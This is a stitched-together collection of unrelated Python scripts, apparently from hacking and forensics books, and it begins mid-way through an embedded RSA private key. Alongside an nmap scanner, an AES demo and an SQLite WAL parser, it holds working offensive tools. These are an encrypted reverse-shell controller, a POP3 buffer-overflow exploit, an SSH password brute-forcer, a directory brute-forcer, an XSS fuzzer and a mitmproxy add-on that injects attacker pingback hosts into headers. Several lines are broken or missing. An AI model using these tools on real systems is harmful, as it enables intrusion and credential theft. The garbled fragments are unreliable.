4GaEN4c+qZf++3CGC7VuQjajaUiuvp5jV7FoS5YeI9UorwuxxRZlQ/oPftKCuJP4 0K2tVzYcfB923h/SlnRD0E30fXC0AG3FOwK0XUmifvb6vp5492IRv+WkY4XXBHc9 iuOOf5hRuqT1JAO6StKQwvYsBbtaBTBRpYnkbSDh2hjzCvnS7dGwBuDF98ceaPwn 9gfHdZHQX+V3eCQxXBKm7oLIQ5qUPOHyRDI3+Fnw38G6u4gmtI3H7TzlGfIU3SWY YDzesac/FEalNwKCAQEA0azr/oLUF00j58w7TosNdXdbJj2tHgnob/lTKGSMHGva RT90eOoJ8H8XWlk7sm4B0zkRwEc+78B5xe6OHdqnNl+9LdC0xgssmcfptnkmSEm/ 5Ajzg7nK2tWUcocmBi8FnzuqDAtSWOZwwtRPkws7J0DOraDmq9gsTaby6unwYIKq xeBe3V7tagxReHVZeSq9GFdJwA5I9lyB7ow77PTvEIaF+9GLnIzGpLyVRbFmsSOe zk6Maj1WytdWxl3eLBhi0rtrS41+cqqbP+bR05fXjT25Q4KPxf+L9C5gZ0Pf5XKE +/oPJT2MuNNzfTTqpcWDUsdXUq8EnphzmLVxC/v97wKCAQAgS8WAT00VXf28BCsX T60pdLvtwx+ylK1IdwB6+LnmrMC5WRCqm2/yoj3n0p6tIF3VVm8NEeK//UuoupW9 JJQtjlEKHpWZ8iQxlCmuRBMYjJHfPD1x8UOIDHbuSlLo9Etl94grFWDm2qt4fn3l G2TBFLjs4upM8Gvo6L3GlYvyJze4dA22a6MXiq2gXhLhxHp7SkPe9V5P5F5g917r i73a6Q0Rvp7csphtKd1erHKywOMEkpUu3tVpSTBnzFE/5LD0PIiN0lT2acgiWdhk CPBOpZBKtL3NnhfCTqNpVBxhBLX1cV+FA4TrHbwybAKVL/Lj7kjd5JA94HkSrG3e E9FhAoIBAAwefpV7Yl7maojfWR41E1YSzAXt0q/FytWOB6xyA1cxNLCD9mt2u5RX BDaIqdaqXRikV85RT+XzrhYur7AyDzApYHnhclFwG+fXkj6lyfyrppe7nLekaYE0 jxv/i8cXuK93d2Cy1tOknifktaS+JXEjYc7PWgXcvNLQL4I8e1RYuR4u1czdy8Mx axQXVFCYk81wXibnrHfw6OGs4VnU3myKGfxwJC2sRV8IN2iL1G+wq2EpURxi5z1a LP3SNyE9V5julEkNqJ1gFxEeekpMoHzdcHPifATpvGEkvRW66poMgHs//NgeMqAM OMSn5lgmjmyecQGqdA3mqefNtPcIXakCggEAZBQ1Le1yns/PXSXdrL50mjuabiIW QtMlUWwWCUF7auO2EMUKvgO6cM0zPJoYpls935f8PgVLvTym/2E8cTWeqqeUwJ92 ZUFxCA7rEZLklvskwpDeX4dS6S51oYUG7tBiY5st61vq1RsCC8gSY4VyyfLbXxMU vMNywPPqjQ2ZOA+Vg3ehBO1AqZIj5/GwGQoUVLU8hzbfVCUOULhLegjMwZYiU8OK j24jWzeq9ikNWBKHmmahnbNaAg7gzPeW1FNME5jiD39AsRLXPaSKFKqBugmsj4Ae 7boESuID2LBpCIkes2A2tRtJQzC7wi/jI1JQIENiZGKm/0Aftxv5YoseFw== -----END RSA PRIVATE KEY-----''' decryptor = RSA.importKey(privatekey) dec = decryptor.decrypt(cipher) return dec def connect(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("", 8080)) s.listen(1) print '[+] Listening for incoming TCP connection on port 8080' conn, addr = s.accept() print '[+] We got a connection from: ', addr while True: store = '' command = raw_input("Shell> ") command = encrypt(command) if 'terminate' in command: conn.send('terminate') conn.close() break else: conn.send(command) result = conn.recv(512) if len ( decrypt (result) ) ==512: store = store + decrypt (result) result = conn.recv(512) store = store + decrypt (result) #If the received output was bigger than 1024 Bytes, then we need to repeat the last two lines else: print decrypt (result) print store def main (): connect() main()
""" GREP Plugin for DoS Failure to Release Resources (OWASP-DS-007) NOTE: GREP plugins do NOT send traffic to the target and only grep the HTTP Transaction Log """ from owtf.plugin.helper import plugin_helper DESCRIPTION = "Searches transaction DB for timing information" def run(PluginInfo): return plugin_helper.FindTopTransactionsBySpeed()
#!/usr/bin/python import socket buffer=["A"] counter=100 string="A"*2606 + "\x8f\x35\x4a\x5f" +"C"*390 if 1: print"Fuzzing PASS with %s bytes" % len(string) s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('',110)) data=s.recv(1024) #print str(data) s.send('USER root\r\n') data=s.recv(1024) print str(data) s.send('PASS ' + string + '\r\n') data=s.recv(1024) print str(data) print "done" #s.send('QUIT\r\n') #s.close()
fields = { 'name' : 'sean', 'password' : 'password!', 'login' : 'LogIn' } opener = urllib2.build_opener( urllib2.HTTPCookieProcessor() ) request = urllib2.Request( "", urllib.urlencode(fields)) url = response = url ="") response =
from Crypto.Cipher import AES encrypt_AES ='secret-key-12345', AES.MODE_CBC, 'This is an IV456') message = "This is message " ciphertext = encrypt_AES.encrypt(message) print ciphertext decrypt_AES ='secret-key-12345', AES.MODE_CBC, 'This is an IV456') message_decrypted = decrypt_AES.decrypt(ciphertext) print message_decrypted
#!/usr/bin/env python ''' Author: Christopher Duffy Date: February 2015 Name: Purpose: To scan a network Copyright (c) 2015, Christopher Duffy All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ''' import sys try: import nmap except: sys.exit("[!] Install the nmap library: pip install python-nmap") # Argument Validator if len(sys.argv) != 3: sys.exit("Please provide two arguments the first being the targets the second the ports") ports = str(sys.argv[2]) addrs = str(sys.argv[1]) scanner = nmap.PortScanner() scanner.scan(addrs, ports) for host in scanner.all_hosts(): if “” in host: print("The host's IP address is %s and it's hostname was not found") % (host, scanner[host].hostname()) else: print("The host's IP address is %s and it's hostname is %s") % (host, scanner[host].hostname())
import argparse import binascii import csv import logging import os import re import struct import sys from collections import namedtuple from tqdm import trange __author__ = 'Preston Miller & Chapin Bryce' __date__ = '20160401' __version__ = 0.01 __description__ = '''This scripts processes SQLite "Write Ahead Logs" and extracts database entries that may contain deleted records or records that have not yet been added to the main database.''' def main(wal_file, output_dir, **kwargs): """ The main function parses the header of the input file and identifies the WAL file. It then splits the file into the appropriate frames and send them for processing. After processing, if applicable, the regular expression modules are ran. Finally the raw data output is written to a CSV file. :param wal_file: The filepath to the WAL file to be processed :param output_dir: The directory to write the CSV report to. :return: Nothing. """ msg = 'Identifying and parsing file header' print '[+]', msg wal_attributes = {'size': os.path.getsize(wal_file), 'header': {}, 'frames': {}} with open(wal_file, 'rb') as wal: # Parse 32-byte WAL header. header = # If file is less than 32 bytes long: exit wal_crawler. try: wal_attributes['header'] = dictHelper(header, '>4s7i', namedtuple('struct', 'magic format pagesize checkpoint ' 'salt1 salt2 checksum1 checksum2')) except struct.error, e: logging.error('STRUCT ERROR:', e.message) print '[-]', e.message + '. Exiting..' sys.exit(2) # Do not proceed in the program if the input file is not a WAL file. magic_hex = binascii.hexlify(wal_attributes['header']['magic']) if magic_hex != "377f0682" and magic_hex != "377f0683": logging.error('Magic mismatch, expected 0x377f0682 or 0x377f0683 | received {}'.format(magic_hex)) print '[-] File does not have appropriate signature for WAL file. Exiting...' sys.exit(3)'File signature matched.')'Processing WAL file.') # Calculate number of frames. frames = (wal_attributes['size'] - 32) / (wal_attributes['header']['pagesize'] + 24) print '[+] Identified', frames, 'Frames.' # Parse frames in WAL file. Create progress bar using trange(frames) which is an alias for tqdm(xrange(frames)). print '[+] Processing frames...' for x in trange(frames): # Parse 24-byte WAL frame header. wal_attributes['frames'][x] = {} frame_header = wal_attributes['frames'][x]['header'] = dictHelper(frame_header, '>6i', namedtuple('struct', 'pagenumber commit salt1' ' salt2 checksum1' ' checksum2')) # Parse pagesize WAL frame. frame =['header']['pagesize']) frameParser(wal_attributes, x, frame) # Run regular expression functions. if kwargs['m'] or kwargs['r']: regularSearch(wal_attributes, kwargs) # Write WAL data to CSV file. csvWriter(wal_attributes, output_dir) def frameParser(wal_dict, x, frame): """ The frameParser function processes WAL frames. :param wal_dict: The dictionary containing parsed WAL objects. :param x: An integer specifying the current frame. :param frame: The content within the frame read from the WAL file. :return: Nothing. """ # Parse 8-byte WAL page header page_header = frame[0:8] wal_dict['frames'][x]['page_header'] = dictHelper(page_header, '>b3hb', namedtuple('struct', 'type freeblocks cells offset' ' fragments')) # Only want to parse 0x0D B-Tree Leaf Cells if wal_dict['frames'][x]['page_header']['type'] != 13:'Found a non-Leaf Cell in frame {}. Popping frame from dictionary'.format(x)) wal_dict['frames'].pop(x) return # Parse offsets for "X" cells cells = wal_dict['frames'][x]['page_header']['cells'] wal_dict['frames'][x]['cells'] = {} print '[+] Identified', cells, 'cells in frame', x print '[+] Processing cells...' for y in xrange(cells): start = 8 + (y * 2) wal_dict['frames'][x]['cells'][y] = {} wal_dict['frames'][x]['cells'][y] = dictHelper(frame[start: start + 2], '>h', namedtuple('struct', 'offset')) # Parse cell content cellParser(wal_dict, x, y, frame) def cellParser(wal_dict, x, y, frame): """ The cellParser function processes WAL cells. :param wal_dict: The dictionary containing parsed WAL objects. :param x: An integer specifying the current frame. :param y: An integer specifying the current cell. :param frame: The content within the frame read from the WAL file. :return: Nothing. """ index = 0 # Create alias to cell_root to shorten navigating the WAL dictionary structure. cell_root = wal_dict['frames'][x]['cells'][y] cell_offset = cell_root['offset'] # Parse the payload length and rowID Varints. payload_len, index_a = singleVarint(frame[cell_offset:cell_offset + 9]) row_id, index_b = singleVarint(frame[cell_offset + index_a: cell_offset + index_a + 9]) # Update the index. Following the payload length and rowID is the 1-byte header length. cell_root['payloadlength'] = payload_len cell_root['rowid'] = row_id index += index_a + index_b cell_root['headerlength'] = struct.unpack('>b', frame[cell_offset + index: cell_offset + index + 1])[0] # Update the index with the 1-byte header length. Next process each Varint in "headerlength" - 1 bytes. index += 1 types, index_a = multiVarint(frame[cell_offset + index:cell_offset+index+cell_root['headerlength']-1]) cell_root['types'] = types index += index_a # Immediately following the end of the Varint headers begins the actual data described by the headers. # Process them using the typeHelper function. diff = cell_root['payloadlength'] - cell_root['headerlength'] cell_root['data'] = typeHelper(cell_root['types'], frame[cell_offset + index: cell_offset + index + diff]) def dictHelper(data, format, keys): """ The dictHelper function creates an OrderedDictionary from a struct tuple. :param data: The data to be processed with struct. :param format: The struct format string. :param keys: A string of the keys for the values in the struct tuple. :return: An OrderedDictionary with descriptive keys of struct-parsed values. """ return keys._asdict(keys._make(struct.unpack(format, data))) def singleVarint(data, index=0): """ The singleVarint function processes a Varint and returns the length of that Varint. :param data: The data containing the Varint (maximum of 9 bytes in length as that is the maximum size of a Varint). :param index: The current index within the data. :return: varint, the processed varint value, and index which is used to identify how long the Varint was. """ # If the decimal value is => 128 -- then first bit is set and need to process next byte. try: x = ord(data[index:index+1]) except TypeError: raise TypeError if x >= 128: varint = (ord(data[index:index+1]) - 128) * 128 + ord(data[index + 1: index + 2]) index += 2 return varint, index # If the decimal value is < 128 -- then first bit is not set and is the only byte of the Varint. else: varint = ord(data[index:index+1]) index += 1 return varint, index def multiVarint(data): """ The multiVarint function is similar to the singleVarint function. The difference is that it takes a range of data and finds all Varints within it. :param data: The data containing the Varints. :return: varints, a list containing the processed varint values, and index which is used to identify how long the Varints were. """ varints = [] index = 0 # Loop forever until all Varints are found by repeatedly calling singleVarint. while len(data) != 0: varint, index_a = singleVarint(data) varints.append(varint) index += index_a # Shorten data to exclude the most recent Varint. data = data[index_a:] return varints, index def typeHelper(types, data): """ The typeHelper function decodes the serial type of the Varints in the WAL file. :param types: The processed values of the Varints. :param data: The raw data in the cell that needs to be properly decoded via its varint values. :return: cell_data, a list of the processed data. """ cell_data = [] index = 0 # Value of type dictates how the data should be processed. See serial type table in chapter # for list of possible values. for type in types: if type == 0: cell_data.append('NULL (RowId?)') elif type == 1: cell_data.append(struct.unpack('>b', data[index:index + 1])[0]) index += 1 elif type == 2: cell_data.append(struct.unpack('>h', data[index:index + 2])[0]) index += 2 elif type == 3: # Struct does not support 24-bit integer cell_data.append(int(binascii.hexlify(data[index:index + 3]), 16)) index += 3 elif type == 4: cell_data.append(struct.unpack('>i', data[index:index + 4])[0]) index += 4 elif type == 5: # Struct does not support 48-bit integer cell_data.append(int(binascii.hexlify(data[index:index + 6]), 16)) index += 6 elif type == 6: cell_data.append(struct.unpack('>q', data[index:index + 8])[0]) index += 8 elif type == 7: cell_data.append(struct.unpack('>d', data[index:index + 8])[0]) index += 8 # Type 8 == Constant 0 and Type 9 == Constant 1. Neither of these take up space in the actual data. elif type == 8: cell_data.append(0) elif type == 9: cell_data.append(1) # Types 10 and 11 are reserved and currently not implemented. elif type > 12 and type % 2 == 0: b_length = (type - 12) / 2 cell_data.append(data[index:index + b_length]) index += b_length elif type > 13 and type % 2 == 1: s_length = (type - 13) / 2 cell_data.append(data[index:index + s_length]) index += s_length else: msg = 'Unexpected serial type: {}'.format(type) print '[-]', msg logging.error(msg) return cell_data def csvWriter(data, output_dir): """ The csvWriter function writes frame, cell, and data to a CSV output file. :param data: The dictionary containing the parsed WAL file. :param output_dir: The directory to write the CSV report to. :return: Nothing. """ headers = ['Frame', 'Salt-1', 'Salt-2', 'Frame Offset', 'Cell', 'Cell Offset', 'ROWID', 'Data'] with open(os.path.join(output_dir, 'wal_crawler.csv'), 'wb') as csvfile: writer = csv.writer(csvfile) writer.writerow(headers) for frame in data['frames']: for cell in data['frames'][frame]['cells']: # Only write entries for cells that have data. if len(data['frames'][frame]['cells'][cell]['data']) > 0: # Convert relative frame and cell offsets to file offsets. frame_offset = 32 + (frame * data['header']['pagesize']) + (frame * 24) cell_offset = frame_offset + 24 + data['frames'][frame]['cells'][cell]['offset'] # Cell identifiers include the frame #, salt-1, salt-2, frame offset, # cell #, cell offset, and cell rowID. cell_identifiers = [frame, data['frames'][frame]['header']['salt1'], data['frames'][frame]['header']['salt2'], frame_offset, cell, cell_offset, data['frames'][frame]['cells'][cell]['rowid']] # Write the cell_identifiers and actual data within the cell writer.writerow(cell_identifiers + data['frames'][frame]['cells'][cell]['data']) else: continue csvfile.flush() csvfile.close() def regularSearch(data, options): """ The regularSearch function performs either default regular expression searches for personal information or custom searches based on a supplied regular expression string. :param data: The dictionary containing the parsed WAL file. :param options: The options dictionary contains custom or pre-determined regular expression searching :return: Nothing. """ msg = 'Initializing regular expression module.' print '\n{}\n[+]'.format('='*20), msg if options['r'] and not options['m']: regexp = {'Custom': options['r']} else: # Default regular expression modules include: Credit card numbers, SSNs, Phone numbers, URLs, # IP Addresses. regexp = {'Visa Credit Card': r'^4\d{3}([\ \-]?)\d{4}\1\d{4}\1\d{4}$', 'SSN': r'^\d{3}-\d{2}-\d{4}$', 'Phone Number': r'^\d{3}([\ \. \-]?)\d{3}\1\d{4}$', 'URL': r"(http[s]?://)|(www.)(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+", 'IP Address': r'^\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}$'} if options['r']: regexp['Custom'] = options['r'] # Must compile each regular expression before seeing if any data "matches" it. for exp in regexp.keys(): reg_exp = re.compile(regexp[exp]) for frame in data['frames']: for cell in data['frames'][frame]['cells']: for datum in xrange(len(data['frames'][frame]['cells'][cell]['data'])): # TypeError will occur for non-string objects such as integers. try: match = reg_exp.match(data['frames'][frame]['cells'][cell]['data'][datum]) except TypeError: continue # Print any successful match to user. if match: msg = '{}: {}'.format(exp, data['frames'][frame]['cells'][cell]['data'][datum]) print '[*]', msg print '='*20 if __name__ == '__main__': parser = argparse.ArgumentParser(version=str(__version__), description=__description__, epilog='Developed by ' + __author__ + ' on ' + __date__) parser.add_argument('WAL', help='SQLite WAL file') parser.add_argument('OUTPUT_DIR', help='Output Directory') parser.add_argument('-r', help='Custom regular expression') parser.add_argument('-m', help='Run regular expression module', action='store_true') parser.add_argument('-l', help='File path of log file') args = parser.parse_args() if args.l: if not os.path.exists(args.l): os.makedirs(args.l) log_path = os.path.join(args.l, 'wal_crawler.log') else: log_path = 'wal_crawler.log' logging.basicConfig(filename=log_path, level=logging.DEBUG, format='%(asctime)s | %(levelname)s | %(message)s', filemode='a')'Starting Wal_Crawler v.' + str(__version__)) logging.debug('System ' + sys.platform) logging.debug('Version ' + sys.version) if not os.path.exists(args.OUTPUT_DIR): os.makedirs(args.OUTPUT_DIR) if os.path.exists(args.WAL) and os.path.isfile(args.WAL): main(args.WAL, args.OUTPUT_DIR, r=args.r, m=args.m) else: msg = 'Supplied WAL file does not exist or is not a file' print '[-]', msg logging.error(msg) sys.exit(1)
import pxssh import optparse import time from threading import * maxConnections = 5 connection_lock = BoundedSemaphore(value=maxConnections) Found = False Fails = 0 def connect(host, user, password, release): global Found global Fails try: s = pxssh.pxssh() s.login(host, user, password) print '[+] Password Found: ' + password Found = True except Exception, e: if 'read_nonblocking' in str(e): Fails += 1 time.sleep(5) connect(host, user, password, False) elif 'synchronize with original prompt' in str(e): time.sleep(1) connect(host, user, password, False) finally: if release: connection_lock.release() def main(): parser = optparse.OptionParser('usage %prog '+\ '-H <target host> -u <user> -F <password list>' ) parser.add_option('-H', dest='tgtHost', type='string',\ help='specify target host') parser.add_option('-F', dest='passwdFile', type='string',\ help='specify password file') parser.add_option('-u', dest='user', type='string',\ help='specify the user') (options, args) = parser.parse_args() host = options.tgtHost passwdFile = options.passwdFile user = options.user if host == None or passwdFile == None or user == None: print parser.usage exit(0) fn = open(passwdFile, 'r') for line in fn.readlines(): if Found: print "[*] Exiting: Password Found" exit(0) if Fails > 5: print "[!] Exiting: Too Many Socket Timeouts" exit(0) connection_lock.acquire() password = line.strip('\r').strip('\n') print "[-] Testing: "+str(password) t = Thread(target=connect, args=(host, user,\ password, True)) child = t.start() if __name__ == '__main__': main()
import urllib2 import urllib import threading import Queue threads = 5 target_url = "" wordlist_file = "/tmp/all.txt" # from SVNDigger resume = None user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0" def build_wordlist(wordlist_file): # read in the word list fd = open(wordlist_file,"rb") raw_words = fd.readlines() fd.close() found_resume = False words = Queue.Queue() for word in raw_words: word = word.rstrip() if resume is not None: if found_resume: words.put(word) else: if word == resume: found_resume = True print "Resuming wordlist from: %s" % resume else: words.put(word) return words def dir_bruter(extensions=None): while not word_queue.empty(): attempt = word_queue.get() attempt_list = [] # check if there is a file extension if not # it's a directory path we're bruting if "." not in attempt: attempt_list.append("/%s/" % attempt) else: attempt_list.append("/%s" % attempt) # if we want to bruteforce extensions if extensions: for extension in extensions: attempt_list.append("/%s%s" % (attempt,extension)) # iterate over our list of attempts for brute in attempt_list: url = "%s%s" % (target_url,urllib.quote(brute)) try: headers = {} headers["User-Agent"] = user_agent r = urllib2.Request(url,headers=headers) response = urllib2.urlopen(r) if len( print "[%d] => %s" % (response.code,url) except urllib2.HTTPError,e: if e.code != 404: print "!!! %d => %s" % (e.code,url) pass word_queue = build_wordlist(wordlist_file) extensions = [".php",".bak",".orig",".inc"] for i in range(threads): t = threading.Thread(target=dir_bruter,args=(extensions,)) t.start()
#!/usr/bin/python3 import re import sys import json import string import random import datetime import socket import requests import functools from urllib.parse import urljoin, urlparse from threading import Lock from Database import Database from threading import Thread from time import sleep from mitmproxy import http, ctx VERSION = '0.1' # Must point to JSON file containing configuration mentioned in `config` dictionary below. # One can either supply that configuration file, or let the below variable empty and fill the `config` # dictionary instead. CONFIGURATION_FILE = 'config.json' config = { 'debug' : False, # The server hostname where affected systems shall pingback. 'pingback-host': '', 'server-remote-addr': '', 'mysql-host': '', 'mysql-user': '', 'mysql-pass': '', 'mysql-database': '', } append_headers = ( 'X-Forwarded-For', 'Referer', 'True-Client-IP', 'X-Originating-IP', 'X-Client-IP', 'Client-IP', 'X-Real-IP', 'Contact', 'Forwarded', 'CF-Connecting_IP', 'X-WAP-Profile' ) visited_hosts = set() add_host_lock = Lock() database_lock = Lock() CONNECTION_TIMEOUT = 4.0 CHUNK_SIZE = 512 def generateRandomId(): randomized = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(50)) return "xxx" + randomized + "yyy" # note that this decorator ignores **kwargs def memoize(obj): cache = obj.cache = {} @functools.wraps(obj) def memoizer(*args, **kwargs): if args not in cache: cache[args] = obj(*args, **kwargs) return cache[args] return memoizer def dbg(x): if 'debug' in config.keys() and config['debug']: print('[dbg] ' + x) class SendRawHttpRequest: def __init__(self): self.sock = None def connect(self, host, port, _ssl, timeout): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if _ssl: context = ssl.create_default_context() context.check_hostname = False context.options |= ssl.OP_ALL context.verify_mode = ssl.CERT_NONE self.sock = context.wrap_socket(sock) else: self.sock = sock self.sock.settimeout(timeout) self.sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1) self.sock.connect((host, port)) dbg('Connected with {}'.format(host)) return True except Exception as e: ctx.log.error('[!] Could not connect with {}:{}!'.format(host, port)) if config['debug']: raise return False def close(self): if self.sock: self.sock.shutdown(socket.SHUT_RDWR) self.sock.close() self.sock = None self.raw_socket = None self.ssl_socket = None def receiveAll(self, chunk_size=CHUNK_SIZE): chunks = [] while True: chunk = None try: chunk = self.sock.recv(int(chunk_size)) except: if chunk: chunks.append(chunk) break if chunk: chunks.append(chunk) else: break return b''.join(chunks) def send(self, host, port, ssl, data, timeout = CONNECTION_TIMEOUT): if not self.connect(host, port, ssl, timeout): return False self.sock.send(data.encode()) resp = self.receiveAll() self.close() return resp class PyCollaboratorMitmproxyAddon: method = b'' request = None requestBody = None def __init__(self): global config self.databaseInstance = self.connection = None if CONFIGURATION_FILE: config.update(json.loads(open(CONFIGURATION_FILE).read()))'Initializing py-collaborator-mitmproxy-plugin.') self.connection = None self.createConnection() def createConnection(self): self.databaseInstance = Database()"Connecting to MySQL database: {}@{} ...".format( config['mysql-user'], config['mysql-host'] )) self.connection = self.databaseInstance.connection( config['mysql-host'], config['mysql-user'], config['mysql-pass'], config['mysql-database']) if not self.connection: ctx.log.error('Could not connect to the MySQL database! ' \ 'Please configure inner `MySQL` variables such as Host, User, Password.') sys.exit(1)'Connected.') def executeSql(self, query, params = None): try: assert self.connection database_lock.acquire() if not params: out = self.databaseInstance.query(query) else: out = self.databaseInstance.query(query, params = params) database_lock.release() if not out: return [] return out except Exception as e: ctx.log.error('SQL query ("{}", params: {}) has failed: {}'.format( query, str(params), str(e) )) database_lock.release() if config['debug']: raise return [] @staticmethod @memoize def requestToString(request): headers = '\r\n'.join(['{}: {}'.format(k, v) for k, v in request.headers.items()]) out = '{} {} {}\r\n{}'.format(request.command, request.path, request.request_version, headers) return out @staticmethod def getPingbackUrl(request): #guid = str(uuid.uuid4()) guid = generateRandomId() url = "http://{}.{}/".format(guid, config['pingback-host']) return (url, guid) def saveRequestForCorrelation(self, request, pingback, uuid, where): query = 'INSERT INTO requests(id, sent, uuid, desthost, pingback, whereput, request) VALUES(%s, %s, %s, %s, %s, %s, %s)' generatedRequest = PyCollaboratorMitmproxyAddon.requestToString(self.request) desthost = self.request.headers['Host'] values = ('0', datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S'), uuid, desthost, pingback, where, generatedRequest) self.executeSql(query, values) @staticmethod def sendRawRequest(request, requestData): raw = SendRawHttpRequest() port = 80 if request.scheme == 'http' else 443 return raw.send(request.headers['Host'], port, request.scheme == 'https', requestData) def hostOverriding(self): (pingback, uuid) = PyCollaboratorMitmproxyAddon.getPingbackUrl(self.request) requestData = 'GET {} HTTP/1.1\r\n'.format(pingback) requestData+= 'Host: {}\r\n'.format(self.request.headers['Host']) requestData+= 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\n' requestData+= 'Accept: */*\r\n' requestData+= 'Connection: close\r\n' self.saveRequestForCorrelation(self.request, pingback, uuid, 'Overridden Host header ({} -> GET {} )'.format(self.request.headers['Host'], pingback)) PyCollaboratorMitmproxyAddon.sendRawRequest(self.request, requestData)'(2) Re-sent host overriding request ({} -> {})'.format(self.request.path, pingback)) def hostAtManipulation(self): (pingback, uuid) = PyCollaboratorMitmproxyAddon.getPingbackUrl(self.request) url = urljoin(self.request.scheme + '://', self.request.headers['Host'], self.request.path) parsed = urlparse(pingback) requestData = 'GET {} HTTP/1.1\r\n'.format(pingback) requestData+= 'Host: {}@{}\r\n'.format(self.request.headers['Host'], parsed.netloc) requestData+= 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\n' requestData+= 'Accept: */*\r\n' requestData+= 'Connection: close\r\n' self.saveRequestForCorrelation(self.request, pingback, uuid, 'Host header manipulation ({} -> {}@{})'.format(self.request.headers['Host'], self.request.headers['Host'], parsed.netloc)) PyCollaboratorMitmproxyAddon.sendRawRequest(self.request, requestData)'(3) Re-sent host header @ manipulated request ({} -> {}@{})'.format(self.request.headers['Host'], self.request.headers['Host'], parsed.netloc)) def sendMisroutedRequests(self): (pingback, uuid) = PyCollaboratorMitmproxyAddon.getPingbackUrl(self.request) url = self.request.url parsed = urlparse(pingback) self.saveRequestForCorrelation(self.request, pingback, uuid, 'Hijacked Host header ({} -> {})'.format(self.request.headers['Host'], parsed.netloc)) try: dbg('GET {}'.format(url)) requests.get(url, headers = {'Host' : parsed.netloc})'(1) Re-sent misrouted request with hijacked Host header ({} -> {})'.format(self.request.headers['Host'], parsed.netloc)) except (Exception, requests.exceptions.TooManyRedirects) as e: ctx.log.error('Could not issue request to ({}): {}'.format(url, str(e))) if config['debug']: raise self.hostOverriding() self.hostAtManipulation() @memoize def checkIfAlreadyManipulated(self, host): query = 'SELECT desthost FROM {}.requests WHERE desthost = "{}"'.format(config['mysql-database'], host) rows = self.executeSql(query) if rows == False: return rows for row in rows: if self.request.headers['Host'] in row['desthost']: dbg('Host ({}) already was lured for pingback.'.format(row['desthost'])) return True dbg('Host ({}) was not yet lured for pingback.'.format(self.request.headers['Host'])) return False def request_handler(self, req, req_body): global visited_hosts self.request = req self.requestBody = req_body self.request.scheme = self.request.path.split(':')[0].upper() allowed_letters = string.ascii_lowercase + string.digits + '-_.' host = ''.join(list(filter(lambda x: x in allowed_letters, self.request.headers['Host']))) if (host not in visited_hosts) and (not self.checkIfAlreadyManipulated(host)): add_host_lock.acquire() visited_hosts.add(host) add_host_lock.release() for header in append_headers: (pingback, uuid) = PyCollaboratorMitmproxyAddon.getPingbackUrl(self.request) self.request.headers[header] = pingback if 'IP' in header: self.request.headers[header] = '{}.{}'.format(uuid, config['pingback-host']) self.saveRequestForCorrelation(pingback, header, uuid, 'Header: {}'.format(header)) self.sendMisroutedRequests()'Injected pingbacks for host ({}).'.format(host)) return self.requestBody def requestForMitmproxy(self, flow): class Request: def __init__(self, flow): self.scheme = flow.request.scheme self.path = flow.request.path self.method = flow.request.method self.command = flow.request.method = str( self.port = int(flow.request.port) self.http_version = flow.request.http_version self.request_version = flow.request.http_version self.headers = {} self.req_body = flow.request.content self.url = flow.request.url self.headers['Host'] = for k,v in flow.request.headers.items(): self.headers[k] = v def __str__(self): out = '{} {} {}\r\n'.format(self.method, self.path, self.http_version) for k, v in self.headers.items(): out += '{}: {}\r\n'.format(k, v) if self.req_body: out += '\r\n{}'.format(self.req_body) return out + '\r\n' req = Request(flow) req_body = req.req_body #'DEBUG2: req.path = {}'.format(req.path)) #'DEBUG2: req.url = {}'.format(req.url)) #'DEBUG5: req.request_version = {}'.format(req.request_version)) #'DEBUG5: req.headers = {}'.format(str(req.headers))) #'DEBUG5: req.req_body = ({})'.format(req.req_body)) #'DEBUG6: REQUEST BODY:\n{}'.format(str(req))) return self.request_handler(req, req_body) def request(flow: http.HTTPFlow) -> None: globalPyCollaborator.requestForMitmproxy(flow) globalPyCollaborator = PyCollaboratorMitmproxyAddon() addons = [request]
import mechanize url = "" browser = mechanize.Browser() attackNumber = 1 with open('XSS-vectors.txt') as f: for line in f: browser.select_form(nr=0) browser["fname"] = line res = browser.submit() content = # check the attack vector is printed in the response. if content.find(line) > 0: print "Possible XXS" output = open('response/'+str(attackNumber)+'.txt', 'w') output.write(content) output.close() print attackNumber attackNumber += 1
